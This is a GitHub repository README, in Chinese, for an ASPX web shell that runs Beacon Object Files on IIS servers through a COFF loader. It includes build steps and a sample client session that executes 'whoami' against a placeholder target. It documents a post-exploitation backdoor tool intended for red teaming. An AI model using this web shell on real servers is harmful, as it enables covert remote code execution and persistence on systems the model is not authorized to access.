epotseluevskaya/ASPX_WebShell_COFFLoader
GitHub: epotseluevskaya/ASPX_WebShell_COFFLoader
基于 TrustedSec COFFLoader 实现的 ASPX Web Shell,支持通过 Python 客户端在目标 IIS 服务器上执行 Beacon Object Files。
Stars: 63 | Forks: 10
# 带 COFF Loader 的 ASPX Web Shell
基于 TrustedSec 的 [CS_COFFLoader](https://github.com/trustedsec/CS_COFFLoader)
## 描述
此 ASPX web shell 允许使用半交互式 Python 客户端在目标服务器上执行 **Beacon Object Files (BOFs)**。
它利用了源自 TrustedSec `CS_COFFLoader` 的 COFF loader 实现。
本项目**严格用于安全研究和授权渗透测试**。使用本项目即表示您同意遵守所有适用的法律和法规。
## 前置条件
在使用之前,您需要:
1. 从 https://github.com/trustedsec/CS_COFFLoader/tree/main/beacon_object 编译 `beacon_compatibility.c`,并将 ASPX 文件中的 `{{BEACON_DATA}}` 占位符替换为 Base64 编码的目标文件。
2. 编译您的 BOF,例如来自 https://github.com/trustedsec/CS-Situational-Awareness-BOF 的 BOF,并在 Web 客户端中指定包含已编译 BOF 的目录路径。
## 使用方法
```
python3 webshell_bof_client.py http://1.2.3.4/bof.aspx
[*] ASPX Web Shell With COFF Loader Client
[*] Target: http://1.2.3.4/bof.aspx
[*] Beacons: /usr/share/beacons
[*] Type 'help' for available commands.
bof> help
Client for ASPX Web Shell with COFF Loader
Based on TrustedSec's COFFLoader: https://github.com/trustedsec/COFFLoader/tree/main
Author: Eugenie Potseluevskaya
For security research and authorized penetration testing only.
Use strictly on systems you own or have explicit written permission to test.
Unauthorized use is illegal and the author assumes no liability for misuse or damages resulting from this code.
Available commands:
help
Show this message.
list
List available beacons in the beacons directory.
exec [format_string [arg1 arg2 ...]]
Execute a beacon against the server.
beacon_name Name of the beacon subdirectory.
format_string bof_pack format string (b/i/s/z/Z). Omit if no args needed.
arg1 arg2 ... Arguments matching the format string.
Examples:
exec whoami
exec mybeacon z "hello world"
exec mybeacon zi "some string" 42
exec mybeacon zZ "str1" "widestr"
exit
Quit the client.
bof> exec whoami
[*] Sending 'whoami' (x64) to http://1.2.3.4/bof.aspx ...
── Output ──────────────────────────────────────
UserName SID
====================== ====================================
IIS APPPOOL\DefaultAppPool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
....
```
标签:ASPX, BOF, COFF Loader, CTF学习, DNS 反向解析, Python 客户端, TrustedSec, Web Shell, 内存加载, 内网渗透, 后门, 命令执行, 嗅探欺骗, 域名收集, 数据展示, 权限维持, 欺骗防御, 红队, 网络信息收集, 逆向工具